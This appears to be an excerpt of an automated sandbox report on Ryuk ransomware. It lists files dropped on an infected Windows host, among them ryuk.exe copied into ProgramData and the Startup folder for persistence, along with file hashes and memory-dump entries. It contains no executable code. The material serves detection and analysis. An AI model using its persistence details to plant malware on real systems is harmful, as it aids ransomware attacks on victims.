34aa4c6bc6d374c3ac231a0ad053ebb0a7da9d7b5d4b367b7f2b2c1be559d99146303aaa2b2374cc766dfde0ca69829de0735c2c6a483377b937fa5645514e0f

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
ac9b14c576becae744db2011f9371f38

SHA1
23e5a5f84527e40314b00ff373af7c6157772123

SHA256
adf2c3a642c9149e6fc55756fc75583d431ed6ca635faadb09e538c97340320e

SHA512
34aa4c6bc6d374c3ac231a0ad053ebb0a7da9d7b5d4b367b7f2b2c1be559d99146303aaa2b2374cc766dfde0ca69829de0735c2c6a483377b937fa5645514e0f

Download Submit
C:\ProgramData\ryuk.exe

Filesize
885KB

MD5
154b73d0a7aa19df12364a78b235f29f

SHA1
5e39ad8cd8f05d29b7587a876c318be5c0511dcc

SHA256
f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea

SHA512
bf32fb8e846170bb5f2c9505e5577e5d3b31f3f9a43030b5f3268d66f3d11f3c983b231742f0d51488c4a288639c0d9e91a911fec0b016d54047e582695a98e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID

Filesize
8B

MD5
d31013fefedfb315cf7677b15198f709

SHA1
420168b77fab2c9ef5b3dcfa3aa499845be1f26c

SHA256
ebd912b4778749e983f23e60c4d14d7d8b80ac6b8ca84f387517cfc5d8e7d9db

SHA512
7652509d218548a43b27df748e6f7ab49a57cb4193e190332dc6a33048fface9cf9f5357a55c1a65e3ec89a8b4b6b3890ae2dd5b1f3c3e1fe678078077c20fa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1

Filesize
2KB

MD5
e42e0fe191611360478184573049b535

SHA1
0337588dee8e9555846994aae1ce073f07362e7f

SHA256
68525230066e3c14959954e31a363f090bdb59ac2a3c792c2920eb0b09fdb6fd

SHA512
9ffaaf1bd1ce451c8561a41f18b7d8e22695220137c195d42db1946bdd5ae87bdd5ed5b2f17a107acf7c3d9e7f06d25cecf5d91ff7ea50e7b1a349c5d89c50b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2

Filesize
292B

MD5
ac9b14c576becae744db2011f9371f38

SHA1
23e5a5f84527e40314b00ff373af7c6157772123

SHA256
adf2c3a642c9149e6fc55756fc75583d431ed6ca635faadb09e538c97340320e

SHA512
34aa4c6bc6d374c3ac231a0ad053ebb0a7da9d7b5d4b367b7f2b2c1be559d99146303aaa2b2374cc766dfde0ca69829de0735c2c6a483377b937fa5645514e0f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

Filesize
885KB

MD5
154b73d0a7aa19df12364a78b235f29f

SHA1
5e39ad8cd8f05d29b7587a876c318be5c0511dcc

SHA256
f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea

SHA512
bf32fb8e846170bb5f2c9505e5577e5d3b31f3f9a43030b5f3268d66f3d11f3c983b231742f0d51488c4a288639c0d9e91a911fec0b016d54047e582695a98e0

Download Submit
memory/112-75-0x0000000000000000-mapping.dmp

Download
memory/520-116-0x0000000000000000-mapping.dmp

Download
memory/544-127-0x0000000000000000-mapping.dmp

Download
memory/552-133-0x0000000000000000-mapping.dmp

Download
memory/564-67-0x0000000000000000-mapping.dmp

Download
memory/592-125-0x0000000000000000-mapping.dmp

Download
memory/612-138-0x0000000000000000-mapping.dmp

Download
memory/636-113-0x0000000000000000-mapping.dmp

Download
memory/676-68-0x0000000000000000-mapping.dmp

Download
memory/688-69-0x0000000000000000-mapping.dmp

Download
memory/696-66-0x0000000000000000-mapping.dmp

Download
memory/812-112-0x0000000000000000-mapping.dmp

Download
memory/848-55-0x0000000000000000-mapping.dmp

Download
memory/956-111-0x0000000000000000-mapping.dmp

Download
memory/964-77-0x0000000000000000-mapping.dmp

Download
memory/1012-70-0x0000000000000000-mapping.dmp

Download
memory/1012-139-0x0000000000000000-mapping.dmp

Download
memory/1028-72-0x0000000000000000-mapping.dmp

Download
memory/1044-126-0x0000000000000000-mapping.dmp

Download
memory/1068-76-0x0000000000000000-mapping.dmp

Download
memory/1072-79-0x0000000000000000-mapping.dmp

Download
memory/1084-107-0x0000000000000000-mapping.dmp

Download
memory/1088-108-0x0000000000000000-mapping.dmp

Download
memory/1172-114-0x0000000000000000-mapping.dmp

Download
memory/1176-96-0x0000000000000000-mapping.dmp

Download
memory/1224-98-0x0000000000000000-mapping.dmp

Download
memory/1244-73-0x0000000000000000-mapping.dmp

Download
memory/1256-110-0x0000000000000000-mapping.dmp

Download
memory/1256-99-0x0000000000000000-mapping.dmp

Download
memory/1256-59-0x0000000000000000-mapping.dmp

Download
memory/1264-97-0x0000000000000000-mapping.dmp

Download
memory/1284-54-0x0000000000000000-mapping.dmp

Download
memory/1328-95-0x0000000000000000-mapping.dmp

Download
memory/1384-105-0x0000000000000000-mapping.dmp

Download
memory/1420-84-0x0000000000000000-mapping.dmp

Download
memory/1460-137-0x0000000000000000-mapping.dmp

Download
memory/1496-124-0x0000000000000000-mapping.dmp

Download
memory/1508-74-0x0000000000000000-mapping.dmp

Download
memory/1532-81-0x0000000000000000-mapping.dmp

Download
memory/1540-62-0x0000000000000000-mapping.dmp

Download
memory/1540-104-0x0000000000000000-mapping.dmp

Download
memory/1540-136-0x0000000000000000-mapping.dmp

Download
memory/1548-118-0x0000000000000000-mapping.dmp

Download
memory/1624-128-0x0000000000000000-mapping.dmp

Download
memory/1664-131-0x0000000000000000-mapping.dmp

Download
memory/1672-91-0x0000000000000000-mapping.dmp

Download
memory/1676-64-0x0000000000000000-mapping.dmp

Download
memory/1688-93-0x0000000000000000-mapping.dmp

Download
memory/1700-123-0x0000000000000000-mapping.dmp

Download
memory/1748-129-0x0000000000000000-mapping.dmp

Download
memory/1808-87-0x0000000000000000-mapping.dmp

Download
memory/1864-56-0x0000000000000000-mapping.dmp

Download
memory/1884-78-0x0000000000000000-mapping.dmp

Download
memory/1896-101-0x0000000000000000-mapping.dmp

Download
memory/1904-80-0x0000000000000000-mapping.dmp

Download
memory/1916-71-0x0000000000000000-mapping.dmp

Download
memory/2000-102-0x0000000000000000-mapping.dmp

Download
memory/2000-65-0x0000000000000000-mapping.dmp

Download
memory/2016-103-0x000007FEFBB31000-0x000007FEFBB33000-memory.dmp

Filesize
8KB

Download
memory/2024-106-0x0000000000000000-mapping.dmp

Download
memory/2032-60-0x0000000000000000-mapping.dmp

Download
memory/2036-100-0x0000000000000000-mapping.dmp

Download
memory/2036-61-0x0000000000000000-mapping.dmp

Download
memory/2040-135-0x0000000000000000-mapping.dmp

Download
memory/2040-58-0x0000000000000000-mapping.dmp

Download